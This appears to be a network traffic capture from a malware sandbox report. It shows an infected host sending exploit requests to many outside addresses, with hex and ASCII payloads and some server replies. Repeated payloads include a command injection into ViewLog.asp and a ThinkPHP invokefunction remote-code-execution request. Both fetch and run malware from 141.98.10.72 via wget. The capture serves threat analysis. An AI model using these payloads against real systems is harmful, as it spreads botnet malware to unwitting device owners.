Feb 14, 2024 09:30:52.502188921 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
882	192.168.2.15	40152	62.202.159.196	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:52.696875095 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
883	192.168.2.15	33046	31.136.140.71	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:52.726061106 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:53.399683952 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:54.743669987 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:57.431718111 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:02.807449102 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:13.559221983 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:36.598519087 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:32:19.605287075 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
884	192.168.2.15	46700	95.106.176.69	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:52.737694979 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:52.978188038 CET	480	IN	HTTP/1.1 404 Not Found Server: mini_httpd/1.19 19dec2003 Date: Wed, 14 Feb 2024 08:30:52 GMT Cache-Control: no-cache,no-store Content-Type: text/html; charset=%s Connection: close Data Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 6e 69 5f 68 74 74 70 64 2f 22 3e 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 31 39 20 31 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/mini_httpd/">mini_httpd/1.19 19dec2003</A></ADDRESS></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
885	192.168.2.15	52210	94.120.37.61	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:52.749761105 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
886	192.168.2.15	32844	95.85.26.17	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:52.921987057 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
887	192.168.2.15	39556	95.143.181.98	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:52.937642097 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:53.149852037 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:31:00 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
888	192.168.2.15	58368	94.120.238.98	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:52.945087910 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
889	192.168.2.15	59394	94.123.156.134	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:52.945190907 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
890	192.168.2.15	54022	94.121.30.251	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:52.946006060 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
891	192.168.2.15	39368	95.81.32.41	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:52.951399088 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:53.181289911 CET	59	IN	HTTP/1.1 400 Bad Request Connection: close
Feb 14, 2024 09:30:53.831242085 CET	59	IN	HTTP/1.1 400 Bad Request Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
892	192.168.2.15	34720	95.215.140.7	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:52.968460083 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:53.214416027 CET	224	IN	HTTP/1.1 404 Not Found Content-type: text/html Content-Length: 0 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Frame-Options:SAMEORIGIN Set-Cookie:Secure; HttpOnly Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
893	192.168.2.15	44980	95.100.205.6	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:52.970267057 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:53.215071917 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:30:53 GMT Date: Wed, 14 Feb 2024 08:30:53 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 65 63 61 34 64 36 38 26 23 34 36 3b 31 37 30 37 38 39 39 34 35 33 26 23 34 36 3b 36 63 32 35 65 33 39 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.4eca4d68.1707899453.6c25e395</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
894	192.168.2.15	46230	95.181.231.226	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:53.105817080 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:53.477621078 CET	932	IN	HTTP/1.1 400 Bad Request Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 681 date: Wed, 14 Feb 2024 08:30:53 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
895	192.168.2.15	51208	94.131.62.237	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:53.391200066 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:53.510370016 CET	1260	IN	HTTP/1.1 400 Bad Request Server: squid/6.0.0-20220501-re899e0c27 Mime-Version: 1.0 Date: Wed, 14 Feb 2024 08:30:53 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3572 X-Squid-Error: ERR_INVALID_URL 0 Vary: Accept-Language Content-Language: en Cache-Status: ezproxies.com Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 